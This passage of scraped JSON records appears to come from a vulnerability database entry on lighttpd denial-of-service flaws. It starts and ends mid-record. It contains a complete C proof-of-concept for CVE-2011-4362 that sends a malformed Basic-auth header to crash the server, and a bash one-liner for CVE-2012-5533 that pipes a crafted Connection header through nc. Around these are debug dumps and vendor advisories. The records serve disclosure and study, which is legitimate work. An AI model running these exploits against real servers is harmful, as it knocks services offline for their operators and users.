31)\r\n-86(b | 43 | 32)\r\n-85(c | 44 | 33)\r\n-84(e | 45 | 33)\r\n-83(d | 46 | 34)\r\n-82(( | 47 | 35)\r\n-81(n | 48 | 36)\r\n-80(y | 49 | 36)\r\n-79(h | 50 | 37)\r\n-78(d | 51 | 38)\r\n-77(g | 52 | 39)\r\n-76(s | 53 | 39)\r\n-75( | 54 | 40)\r\n-74(r | 55 | 41)\r\n-73(p | 56 | 42)\r\n-72(a | 57 | 42)\r\n-71(n | 58 | 43)\r\n-70(. | 59 | 44)\r\n-69(. | 60 | 45)\r\n-68(d | 61 | 45)\r\n-67(g | 62 | 46)\r\n-66(s | 63 | 47)\r\n-65(: | 64 | 48)\r\n-64(( | 65 | 48)\r\n-63(d | 66 | 49)\r\n-62(- | 67 | 50)\r\n-61(e | 68 | 51)\r\n-60(s | 69 | 51)\r\n-59( | 70 | 52)\r\n-58(i | 71 | 53)\r\n-57(s | 72 | 54)\r\n-56(n | 73 | 54)\r\n-55( | 74 | 55)\r\n-54(i | 75 | 56)\r\n-53(l | 76 | 57)\r\n-52(. | 77 | 57)\r\n-51(. | 78 | 58)\r\n-50(k | 79 | 59)\r\n-49(0 | 80 | 60)\r\n-48(% | 81 | 60)\r\n-47(] | 82 | 61)\r\n-46(p | 83 | 62)\r\n-45(r | 84 | 63)\r\n-44(0 | 85 | 63)\r\n-43(% | 86 | 64)\r\n-42(] | 87 | 65)\r\n-41(s | 88 | 66)\r\n-40(z | 89 | 66)\r\n-39([ | 90 | 67)\r\n-38(x | 91 | 68)\r\n-37(x | 92 | 69)\r\n-36( | 93 | 69)\r\n-35(s | 94 | 70)\r\n-34(d | 95 | 71)\r\n-33(0 | 96 | 72)\r\n-32(% | 97 | 72)\r\n-31(] | 98 | 73)\r\n-30(. | 99 | 74)\r\n-29(. | 100 | 75)\r\n-28(d | 101 | 75)\r\n-27(c | 102 | 76)\r\n-26(d | 103 | 77)\r\n-25(i | 104 | 78)\r\n-24(g | 105 | 78)\r\n-23(b | 106 | 79)\r\n-22(s | 107 | 80)\r\n-21(6 | 108 | 81)\r\n-20(- | 109 | 81)\r\n-19(t | 110 | 82)\r\n-18(i | 111 | 83)\r\n-17(g | 112 | 84)\r\n-16(f | 113 | 84)\r\n-15(i | 114 | 85)\r\n-14(e | 115 | 86)\r\n-13(. | 116 | 87)\r\n-12(. | 117 | 87)\r\n-11(. | 118 | 88)\r\n-10(. | 119 | 89)\r\n-9(. | 120 | 90)\r\n-8(. | 121 | 90)\r\n-7(. | 122 | 91)\r\n-6(. | 123 | 92)\r\n-5(. | 124 | 93)\r\n-4(. | 125 | 93)\r\n-3(. | 126 | 94)\r\n-2(. | 127 | 95)\r\n-1(. | 128 | 96)\r\nk[0x60] ptr[0x9a92c48] size[0xc0] used[0x0]\r\nptr[0x9a92c48] size[0xc0] used[0x60]\r\nstring [.Yg.\\...n.Xt.]r.ze.....g.Y..\\..Yb.Y(..d..r.[..Y...-.xi..i.]\r\n--- CUT ---\r\n \r\nFirst column is the offset so vulnerability is executed like it should be\r\n(negative offsets). Second column is byte which is read out-of-bound.\r\n \r\nHow to run this very primitive Proof of Concept?\r\n \r\n$ gcc p_cve-2011-4362.c -o p_cve-2011-4362\r\n$ ./p_cve-2011-4362\r\n \r\n ...::: -=[ Proof of Concept for CVE-2011-4362 (by Adam 'pi3' Zabrocki)\r\n]=- :::...\r\n \r\n Usage: ./p_cve-2011-4362 <options>\r\n \r\n Options:\r\n -v <victim>\r\n -p <port>\r\n -d <remote_dir_for_auth>\r\n \r\n$ ./p_cve-2011-4362 -h 127.0.0.1 -p 81 -d dupa\r\n \r\n ...::: -=[ Proof of Concept for CVE-2011-4362 (by Adam 'pi3' Zabrocki)\r\n]=- :::...\r\n \r\n [+] Preparing arguments... OK\r\n [+] Creating socket... OK\r\n [+] Connecting to [127.0.0.1]... OK\r\n [+] Sending dirty packet... OK\r\n \r\n [+] Check the website!\r\n \r\n$\r\n \r\nLighttpd will log this situation probably in error-log file like this:\r\n \r\n--- CUT ---\r\n..\r\n..\r\n2011-12-xx xx:xx:11: (http_auth.c.887) : is missing in\r\n\ufffdYg\\\ufffd\ufffd\ufffdn\ufffdXt\ufffd]rze\ufffd\ufffd\ufffdgY\ufffd\ufffd\\\ufffd\ufffdYb\ufffdY(\ufffdd\ufffd\ufffdr\ufffd[Y\ufffd\ufffd\ufffd-\ufffdxi\ufffd\ufffdi\ufffdk\ufffdWp\ufffd ]\u07f6\ufffd\ufffd\\\ufffd\ufffd\ufffd@V\ufffd\ufffdx\ufffd\ufffd\ufffdize\r\n \r\n--- CUT ---\r\n \r\nMaybe you can find vulnerable binary?\r\n \r\nBest regards,\r\nAdam 'pi3' Zabrocki\r\n \r\n \r\n--\r\nhttp://pi3.com.pl\r\nhttp://www.exploit-db.com/sploits/p_cve-2011-4362.c\r\nhttp://blog.pi3.com.pl/?p=277\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-30003", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-11-19T15:50:31", "bulletinFamily": "exploit", "description": "No description provided by source.", "modified": "2014-07-01T00:00:00", "published": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-76695", "id": "SSV:76695", "title": "lighttpd 1.4.31 Denial of Service PoC", "type": "seebug", "sourceData": "\n #!/bin/bash\r\n# Exploit Title: simple lighttpd 1.4.31 DOS POC\r\n# Date: 11/21/2012\r\n# Exploit Author: t4c@ghcif.de\r\n# Vendor Homepage: http://www.lighttpd.net\r\n# Software Link: http://download.lighttpd.net/lighttpd/releases-1.4.x/lighttpd-1.4.31.tar.gz \r\n# Version: 1.4.31\r\n# Tested on: Debian Linux, Gentoo Linux, Arch Linux\r\n# CVE: CVE-2012-5533\r\n\r\nif [ $# -lt 2 ]\r\nthen\r\n\techo "usage :$0 <Host/IP> <Port>"\r\nelse\r\n\techo -ne "GET / HTTP/1.1\\r\\nHost: pwn.ed\\r\\nConnection: TE,,Keep-Alive\\r\\n\\r\\n" | nc $1 $2\r\nfi\r\n\n ", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-76695"}, {"lastseen": "2017-11-19T17:58:08", "bulletinFamily": "exploit", "description": "CVE(CAN) ID: CVE-2012-5533\r\n\r\nlighttpd\u662f\u4e00\u6b3e\u5f00\u6e90\u7684\u8f7b\u91cf\u7ea7Web\u670d\u52a1\u5668\u3002\r\n\r\nlighttpd 1.4.31\u5728\u5904\u7406\u67d0\u4e9bHTTP\u8bf7\u6c42\u5934\u65f6\uff0c"http_request_split_value()"\u51fd\u6570(src/request.c)\u5728\u5904\u7406\u7279\u5236\u7684"Connection"\u62a5\u5934\u57df\u65f6\u4f1a\u9677\u5165\u65e0\u9650\u5faa\u73af\u3002\u653b\u51fb\u8005\u5229\u7528\u6b64\u6f0f\u6d1e\u53ef\u5bfc\u81f4Lighttpd\u62d2\u7edd\u670d\u52a1\u3002\n0\nlighttpd 1.4.31\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nLighttpd\r\n--------\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\nhttp://download.lighttpd.net/lighttpd/security/lighttpd-1.4.31_fix_connection_header_dos.patch", "modified": "2012-11-23T00:00:00", "published": "2012-11-23T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-60476", "id": "SSV:60476", "title": "lighttpd\u7578\u5f62HTTP Connection\u57df\u5904\u7406\u62d2\u7edd\u670d\u52a1\u6f0f\u6d1e", "type": "seebug", "sourceData": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": ""}, {"lastseen": "2017-11-19T17:56:15", "bulletinFamily": "exploit", "description": "No description provided by source.", "modified": "2011-12-27T00:00:00", "published": "2011-12-27T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-26120", "id": "SSV:26120", "type": "seebug", "title": "Lighttpd 1.4.30 / 1.5 Denial Of Service", "sourceData": "\n /*\r\n *Lighttpd versions before 1.4.30 and 1.5 before SVN revision 2806 out-of-bounds read segmentation fault denial of service exploit.\r\n * Primitive Lighttpd Proof of Concept code for CVE-2011-4362 vulnerability discovered by Xi Wang\r\n *\r\n * Here the vulnerable code (src/http_auth.c:67)\r\n *\r\n * --- CUT ---\r\n * static const short base64_reverse_table[256] = {\r\n * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0x00 - 0x0F\r\n * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0x10 - 0x1F\r\n * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, 62, -1, -1, -1, 63, /* 0x20 - 0x2F\r\n * 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, -1, -1, -1, -1, -1, -1, /* 0x30 - 0x3F\r\n * -1, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, /* 0x40 - 0x4F\r\n * 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, -1, -1, -1, -1, -1, /* 0x50 - 0x5F\r\n * -1, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, /* 0x60 - 0x6F\r\n * 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, -1, -1, -1, -1, -1, /* 0x70 - 0x7F\r\n * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0x80 - 0x8F\r\n * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0x90 - 0x9F\r\n * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0xA0 - 0xAF\r\n * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0xB0 - 0xBF\r\n * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0xC0 - 0xCF\r\n * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0xD0 - 0xDF\r\n * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0xE0 - 0xEF\r\n * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0xF0 - 0xFF\r\n * };\r\n *\r\n * static unsigned char * base64_decode(buffer *out, const char *in) {\r\n * ...\r\n * int ch, ...;\r\n * size_t i;\r\n * ...\r\n * \r\n * ch = in[i];\r\n * ...\r\n * ch = base64_reverse_table[ch];\r\n * ...\r\n * }\r\n * --- CUT ---\r\n *\r\n * Because variable 'in' is type 'char', characters above 0x80 lead to negative indices.\r\n * This vulnerability may lead out-of-boud read and theoretically cause Segmentation Fault\r\n * (Denial of Service attack). Unfortunately I couldn't find any binaries where .rodata\r\n * section before the base64_reverse_table table cause this situation.\r\n *\r\n * I have added some extra debug in the lighttpd source code to see if this vulnerability is\r\n * executed correctly. Here is output for one of the example:\r\n *\r\n * --- CUT ---\r\n * ptr[0x9a92c48] size[0xc0] used[0x0]\r\n * 127(. | 0 | 0)\r\n * -128(t | 1 | 0)\r\n * -127(e | 2 | 1)\r\n * -126(' | 3 | 2)\r\n * -125(e | 4 | 3)\r\n * -124(u | 5 | 3)\r\n * -123(r | 6 | 4)\r\n * -122(' | 7 | 5)\r\n * -121(s | 8 | 6)\r\n * -120(c | 9 | 6)\r\n * -119(i | 10 | 7)\r\n * -118(n | 11 | 8)\r\n * -117(i | 12 | 9)\r\n * -116( | 13 | 9)\r\n * -115(a | 14 | 10)\r\n * -114(t | 15 | 11)\r\n * -113(. | 16 | 12)\r\n * -112(e | 17 | 12)\r\n * -111(u | 18 | 13)\r\n * -110(r | 19 | 14)\r\n * -109(' | 20 | 15)\r\n * -108(f | 21 | 15)\r\n * -107(i | 22 | 16)\r\n * -106(e | 23 | 17)\r\n * -105(: | 24 | 18)\r\n * -104(= | 25 | 18)\r\n * -103(o | 26 | 19)\r\n * -102(t | 27 | 20)\r\n * -101(o | 28 | 21)\r\n * -100( | 29 | 21)\r\n * -99(a | 30 | 22)\r\n * -98(g | 31 | 23)\r\n * -97(. | 32 | 24)\r\n * -96(d | 33 | 24)\r\n * -95(g | 34 | 25)\r\n * -94(s | 35 | 26)\r\n * -93(: | 36 | 27)\r\n * -92(u | 37 | 27)\r\n * -91(s | 38 | 28)\r\n * -90(p | 39 | 29)\r\n * -89(o | 40 | 30)\r\n * -88(t | 41 | 30)\r\n * -87(d | 42 | 31)\r\n * -86(b | 43 | 32)\r\n * -85(c | 44 | 33)\r\n * -84(e | 45 | 33)\r\n * -83(d | 46 | 34)\r\n * -82(( | 47 | 35)\r\n * -81(n | 48 | 36)\r\n * -80(y | 49 | 36)\r\n * -79(h | 50 | 37)\r\n * -78(d | 51 | 38)\r\n * -77(g | 52 | 39)\r\n * -76(s | 53 | 39)\r\n * -75( | 54 | 40)\r\n * -74(r | 55 | 41)\r\n * -73(p | 56 | 42)\r\n * -72(a | 57 | 42)\r\n * -71(n | 58 | 43)\r\n * -70(. | 59 | 44)\r\n * -69(. | 60 | 45)\r\n * -68(d | 61 | 45)\r\n * -67(g | 62 | 46)\r\n * -66(s | 63 | 47)\r\n * -65(: | 64 | 48)\r\n * -64(( | 65 | 48)\r\n * -63(d | 66 | 49)\r\n * -62(- | 67 | 50)\r\n * -61(e | 68 | 51)\r\n * -60(s | 69 | 51)\r\n * -59( | 70 | 52)\r\n * -58(i | 71 | 53)\r\n * -57(s | 72 | 54)\r\n * -56(n | 73 | 54)\r\n * -55( | 74 | 55)\r\n * -54(i | 75 | 56)\r\n * -53(l | 76 | 57)\r\n * -52(. | 77 | 57)\r\n * -51(. | 78 | 58)\r\n * -50(k | 79 | 59)\r\n * -49(0 | 80 | 60)\r\n * -48(% | 81 | 60)\r\n * -47(] | 82 | 61)\r\n * -46(p | 83 | 62)\r\n * -45(r | 84 | 63)\r\n * -44(0 | 85 | 63)\r\n * -43(% | 86 | 64)\r\n * -42(] | 87 | 65)\r\n * -41(s | 88 | 66)\r\n * -40(z | 89 | 66)\r\n * -39([ | 90 | 67)\r\n * -38(x | 91 | 68)\r\n * -37(x | 92 | 69)\r\n * -36( | 93 | 69)\r\n * -35(s | 94 | 70)\r\n * -34(d | 95 | 71)\r\n * -33(0 | 96 | 72)\r\n * -32(% | 97 | 72)\r\n * -31(] | 98 | 73)\r\n * -30(. | 99 | 74)\r\n * -29(. | 100 | 75)\r\n * -28(d | 101 | 75)\r\n * -27(c | 102 | 76)\r\n * -26(d | 103 | 77)\r\n * -25(i | 104 | 78)\r\n * -24(g | 105 | 78)\r\n * -23(b | 106 | 79)\r\n * -22(s | 107 | 80)\r\n * -21(6 | 108 | 81)\r\n * -20(- | 109 | 81)\r\n * -19(t | 110 | 82)\r\n * -18(i | 111 | 83)\r\n * -17(g | 112 | 84)\r\n * -16(f | 113 | 84)\r\n * -15(i | 114 | 85)\r\n * -14(e | 115 | 86)\r\n * -13(. | 116 | 87)\r\n * -12(. | 117 | 87)\r\n * -11(. | 118 | 88)\r\n * -10(. | 119 | 89)\r\n * -9(. | 120 | 90)\r\n * -8(. | 121 | 90)\r\n * -7(. | 122 | 91)\r\n * -6(. | 123 | 92)\r\n * -5(. | 124 | 93)\r\n * -4(. | 125 | 93)\r\n * -3(. | 126 | 94)\r\n * -2(. | 127 | 95)\r\n * -1(. | 128 | 96)\r\n * k[0x60] ptr[0x9a92c48] size[0xc0] used[0x0]\r\n * ptr[0x9a92c48] size[0xc0] used[0x60]\r\n * string [.Yg.\\...n.Xt.]r.ze.....g.Y..\\..Yb.Y(..d..r.[..Y...-.xi..i.]\r\n * --- CUT ---\r\n *\r\n * First column is the offset so vulnerability is executed like it should be\r\n * (negative offsets). Second column is byte which is read out-of-bound.\r\n *\r\n *\r\n * Maybe you can find vulnerable binary?\r\n *\r\n *\r\n * Best regards,\r\n * Adam 'pi3' Zabrocki\r\n *\r\n *\r\n * --\r\n * http://pi3.com.pl\r\n * http://site.pi3.com.pl/exp/p_cve-2011-4362.c\r\n * http://blog.pi3.com.pl/?p=277\r\n *\r\n */\r\n\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <netdb.h>\r\n#include <netinet/in.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n#include <getopt.h>\r\n\r\n#define PORT 80\r\n#define SA struct sockaddr\r\n\r\nchar header[] =\r\n"GET /%s/ HTTP/1.1\\r\\n"\r\n"Host: %s\\r\\n"\r\n"User-Agent: Mozilla/5.0 (X11; Linux i686; rv:8.0.1) Gecko/20100101 Firefox/8.0.1\\r\\n"\r\n"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\\r\\n"\r\n"Accept-Language: pl,en-us;q=0.7,en;q=0.3\\r\\n"\r\n"Accept-Encoding: gzip, deflate\\r\\n"\r\n"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\\r\\n"\r\n"Proxy-Connection: keep-alive\\r\\n"\r\n"Authorization: Basic ";\r\n\r\nchar header_port[] =\r\n"GET /%s/ HTTP/1.1\\r\\n"\r\n"Host: %s:%d\\r\\n"\r\n"User-Agent: Mozilla/5.0 (X11; Linux i686; rv:8.0.1) Gecko/20100101 Firefox/8.0.1\\r\\n"\r\n"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\\r\\n"\r\n"Accept-Language: pl,en-us;q=0.7,en;q=0.3\\r\\n"\r\n"Accept-Encoding: gzip, deflate\\r\\n"\r\n"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\\r\\n"\r\n"Proxy-Connection: keep-alive\\r\\n"\r\n"Authorization: Basic ";\r\n\r\n\r\nint main(int argc, char *argv[]) {\r\n\r\n int i=PORT,opt=0,sockfd;\r\n char *remote_dir = NULL;\r\n char *r_hostname = NULL;\r\n struct sockaddr_in servaddr;\r\n struct hostent *h = NULL;\r\n char *buf;\r\n unsigned int len = 0x0;\r\n\r\n\r\n if (!argv[1])\r\n usage(argv[0]);\r\n\r\n\r\n printf("\\n\\t...::: -=[ Proof of Concept for CVE-2011-4362 (by Adam 'pi3' Zabrocki) ]=- :::...\\n");\r\n printf("\\n\\t\\t[+] Preparing arguments... ");\r\n while((opt = getopt(argc,argv,"h:d:p:?")) != -1) {\r\n switch(opt) {\r\n\r\n case 'h':\r\n\r\n r_hostname = strdup(optarg);\r\n if ( (h = gethostbyname(r_hostname))==NULL) {\r\n printf("Gethostbyname() field!\\n");\r\n exit(-1);\r\n }\r\n break;\r\n\r\n case 'p':\r\n\r\n i=atoi(optarg);\r\n break;\r\n\r\n case 'd':\r\n\r\n remote_dir = strdup(optarg);\r\n break;\r\n\r\n case '?':\r\n\r\n usage(argv[0]);\r\n break;\r\n\r\n default:\r\n\r\n usage(argv[0]);\r\n break;\r\n\r\n }\r\n }\r\n\r\n if (!remote_dir || !h) {\r\n usage(argv[0]);\r\n exit(-1);\r\n }\r\n\r\n servaddr.sin_family = AF_INET;\r\n servaddr.sin_port = htons(i);\r\n servaddr.sin_addr = *(struct in_addr*)h->h_addr;\r\n\r\n len = strlen(header_port)+strlen(remote_dir)+strlen(r_hostname)+512;\r\n if ( (buf = (char *)malloc(len)) == NULL) {\r\n printf("malloc() :(\\n");\r\n exit(-1);\r\n }\r\n memset(buf,0x0,len);\r\n\r\n if (i != 80)\r\n snprintf(buf,len,header_port,remote_dir,r_hostname,i);\r\n else\r\n snprintf(buf,len,header,remote_dir,r_hostname);\r\n\r\n for (i=0;i<130;i++)\r\n buf[strlen(buf)] = 127+i;\r\n\r\n buf[strlen(buf)] = '\\r';\r\n buf[strlen(buf)] = '\\n';\r\n buf[strlen(buf)] = '\\r';\r\n buf[strlen(buf)] = '\\n';\r\n\r\n printf("OK\\n\\t\\t[+] Creating socket... ");\r\n if ( (sockfd=socket(AF_INET,SOCK_STREAM,0)) < 0 ) {\r\n printf("Socket() error!\\n");\r\n exit(-1);\r\n }\r\n\r\n printf("OK\\n\\t\\t[+] Connecting to [%s]... ",r_hostname);\r\n if ( (connect(sockfd,(SA*)&servaddr,sizeof(servaddr)) ) < 0 ) {\r\n printf("Connect() error!\\n");\r\n exit(-1);\r\n }\r\n\r\n printf("OK\\n\\t\\t[+] Sending dirty packet... ");\r\n// write(1,buf,strlen(buf));\r\n write(sockfd,buf,strlen(buf));\r\n\r\n printf("OK\\n\\n\\t\\t[+] Check the website!\\n\\n");\r\n\r\n close(sockfd);\r\n\r\n}\r\n\r\nint usage(char *arg) {\r\n\r\n printf("\\n\\t...::: -=[ Proof of Concept for CVE-2011-4362 (by Adam 'pi3' Zabrocki) ]=- :::...\\n");\r\n printf("\\n\\tUsage: %s <options>\\n\\n\\t\\tOptions:\\n",arg);\r\n printf("\\t\\t\\t -v <victim>\\n\\t\\t\\t -p <port>\\n\\t\\t\\t -d <remote_dir_for_auth>\\n\\n");\r\n exit(0);\r\n}\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-26120", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-11-19T18:02:45", "bulletinFamily": "exploit", "description": "CVE-2011-4362\r\n\r\nLighttpd\u662f\u4e00\u6b3e\u8f7b\u578b\u7684\u5f00\u653e\u6e90\u7801Web Server\u8f6f\u4ef6\u5305\u3002\r\n\r\nlighttpd\u5728\u8ba4\u8bc1\u6570\u636e\u7684\u89e3\u7801\u5b9e\u73b0\u4e0a\u5b58\u5728\u6f0f\u6d1e\uff0c\u653b\u51fb\u8005\u53ef\u80fd\u5229\u7528\u6b64\u6f0f\u6d1e\u4f7f\u5e94\u7528\u7a0b\u5e8f\u5d29\u6e83\u9020\u6210\u62d2\u7edd\u670d\u52a1\u3002\r\n\r\nhttp_auth.c\u4e2d\u7684\u4ee3\u7801\u5728base64\u89e3\u7801\u7528\u6237\u8f93\u5165\u7684\u8ba4\u8bc1\u6570\u636e\u65f6\u4f7f\u7528"const char *in"\u7c7b\u578b\uff0c\u5e76\u5c06\u6bcf\u4e2a\u5b57\u7b26\u8f6c\u6362\u4e3a"int ch"\u4f5c\u4e3a\u6620\u5c04\u8868\u7684\u7d22\u5f15\uff0c\u5927\u4e8e0x80\u7684\u5b57\u7b26\u5c31\u4f1a\u5bfc\u81f4\u8d1f\u7d22\u5f15\uff0c\u53ef\u80fd\u9020\u6210\u975e\u6cd5\u5185\u5b58\u8bbf\u95ee\u3002\r\n\r\nlighttpd <=1.4.29\r\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nLightTPD\r\n--------\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\nhttp://www.lighttpd.net/", "modified": "2011-12-01T00:00:00", "published": "2011-12-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-24275", "id": "SSV:24275", "title": "lighttpd mod_auth\u6a21\u5757base64 \u62d2\u7edd\u670d\u52a1\u6f0f\u6d1e", "type": "seebug", "sourceData": "\n ---\r\nstatic const short base64_reverse_table[256] = ...;\r\nstatic unsigned char * base64_decode(buffer *out, const char *in) {\r\n ...\r\n int ch, ...;\r\n size_t i;\r\n ...\r\n \r\n ch = in[i];\r\n ...\r\n ch = base64_reverse_table[ch];\r\n ...\r\n}\r\n---\n ", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-24275"}, {"lastseen": "2017-11-19T13:25:09", "bulletinFamily": "exploit", "description": "No description provided by source.", "modified": "2014-07-01T00:00:00", "published": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-72453", "id": "SSV:72453", "type": "seebug", "title": "lighttpd Denial of Service Vulnerability PoC", "sourceData": "\n 29 of November 2011 was the date of public disclosure interesting\r\nvulnerability in lighttpd server. Xi Wang discovered that mod_auth\r\nfor this server does not propely decode characters from the extended\r\nASCII table. The vulnerable code is below:\r\n\r\n\r\n"src/http_auth.c:67"\r\n--- CUT ---\r\nstatic const short base64_reverse_table[256] = ...;\r\nstatic unsigned char * base64_decode(buffer *out, const char *in) {\r\n\t...\r\n\tint ch, ...;\r\n\tsize_t i;\r\n\t...\r\n\r\n\t\tch = in[i];\r\n\t\t...\r\n\t\tch = base64_reverse_table[ch];\r\n\t...\r\n}\r\n--- CUT ---\r\n\r\nBecause variable 'in' is type 'char', characters above 0x80 lead to\r\nnegative indices.\r\nThis vulnerability may lead out-of-boud read and theoretically cause\r\nSegmentation Fault (Denial of Service attack).\r\nUnfortunately I couldn't find any binaries where .rodata section before\r\nthe base64_reverse_table\r\ntable cause this situation.\r\n\r\nI have added some extra debug in the lighttpd source code to see if this\r\nvulnerability is\r\nexecuted correctly. Here is output for one of the example:\r\n\r\n--- CUT ---\r\nptr[0x9a92c48] size[0xc0] used[0x0]\r\n127(. | 0 | 0)\r\n-128(t | 1 | 0)\r\n-127(e | 2 | 1)\r\n-126(' | 3 | 2)\r\n-125(e | 4 | 3)\r\n-124(u | 5 | 3)\r\n-123(r | 6 | 4)\r\n-122(' | 7 | 5)\r\n-121(s | 8 | 6)\r\n-120(c | 9 | 6)\r\n-119(i | 10 | 7)\r\n-118(n | 11 | 8)\r\n-117(i | 12 | 9)\r\n-116( | 13 | 9)\r\n-115(a | 14 | 10)\r\n-114(t | 15 | 11)\r\n-113(. | 16 | 12)\r\n-112(e | 17 | 12)\r\n-111(u | 18 | 13)\r\n-110(r | 19 | 14)\r\n-109(' | 20 | 15)\r\n-108(f | 21 | 15)\r\n-107(i | 22 | 16)\r\n-106(e | 23 | 17)\r\n-105(: | 24 | 18)\r\n-104(= | 25 | 18)\r\n-103(o | 26 | 19)\r\n-102(t | 27 | 20)\r\n-101(o | 28 | 21)\r\n-100( | 29 | 21)\r\n-99(a | 30 | 22)\r\n-98(g | 31 | 23)\r\n-97(. | 32 | 24)\r\n-96(d | 33 | 24)\r\n-95(g | 34 | 25)\r\n-94(s | 35 | 26)\r\n-93(: | 36 | 27)\r\n-92(u | 37 | 27)\r\n-91(s | 38 | 28)\r\n-90(p | 39 | 29)\r\n-89(o | 40 | 30)\r\n-88(t | 41 | 30)\r\n-87(d | 42 | 31)\r\n-86(b | 43 | 32)\r\n-85(c | 44 | 33)\r\n-84(e | 45 | 33)\r\n-83(d | 46 | 34)\r\n-82(( | 47 | 35)\r\n-81(n | 48 | 36)\r\n-80(y | 49 | 36)\r\n-79(h | 50 | 37)\r\n-78(d | 51 | 38)\r\n-77(g | 52 | 39)\r\n-76(s | 53 | 39)\r\n-75( | 54 | 40)\r\n-74(r | 55 | 41)\r\n-73(p | 56 | 42)\r\n-72(a | 57 | 42)\r\n-71(n | 58 | 43)\r\n-70(. | 59 | 44)\r\n-69(. | 60 | 45)\r\n-68(d | 61 | 45)\r\n-67(g | 62 | 46)\r\n-66(s | 63 | 47)\r\n-65(: | 64 | 48)\r\n-64(( | 65 | 48)\r\n-63(d | 66 | 49)\r\n-62(- | 67 | 50)\r\n-61(e | 68 | 51)\r\n-60(s | 69 | 51)\r\n-59( | 70 | 52)\r\n-58(i | 71 | 53)\r\n-57(s | 72 | 54)\r\n-56(n | 73 | 54)\r\n-55( | 74 | 55)\r\n-54(i | 75 | 56)\r\n-53(l | 76 | 57)\r\n-52(. | 77 | 57)\r\n-51(. | 78 | 58)\r\n-50(k | 79 | 59)\r\n-49(0 | 80 | 60)\r\n-48(% | 81 | 60)\r\n-47(] | 82 | 61)\r\n-46(p | 83 | 62)\r\n-45(r | 84 | 63)\r\n-44(0 | 85 | 63)\r\n-43(% | 86 | 64)\r\n-42(] | 87 | 65)\r\n-41(s | 88 | 66)\r\n-40(z | 89 | 66)\r\n-39([ | 90 | 67)\r\n-38(x | 91 | 68)\r\n-37(x | 92 | 69)\r\n-36( | 93 | 69)\r\n-35(s | 94 | 70)\r\n-34(d | 95 | 71)\r\n-33(0 | 96 | 72)\r\n-32(% | 97 | 72)\r\n-31(] | 98 | 73)\r\n-30(. | 99 | 74)\r\n-29(. | 100 | 75)\r\n-28(d | 101 | 75)\r\n-27(c | 102 | 76)\r\n-26(d | 103 | 77)\r\n-25(i | 104 | 78)\r\n-24(g | 105 | 78)\r\n-23(b | 106 | 79)\r\n-22(s | 107 | 80)\r\n-21(6 | 108 | 81)\r\n-20(- | 109 | 81)\r\n-19(t | 110 | 82)\r\n-18(i | 111 | 83)\r\n-17(g | 112 | 84)\r\n-16(f | 113 | 84)\r\n-15(i | 114 | 85)\r\n-14(e | 115 | 86)\r\n-13(. | 116 | 87)\r\n-12(. | 117 | 87)\r\n-11(. | 118 | 88)\r\n-10(. | 119 | 89)\r\n-9(. | 120 | 90)\r\n-8(. 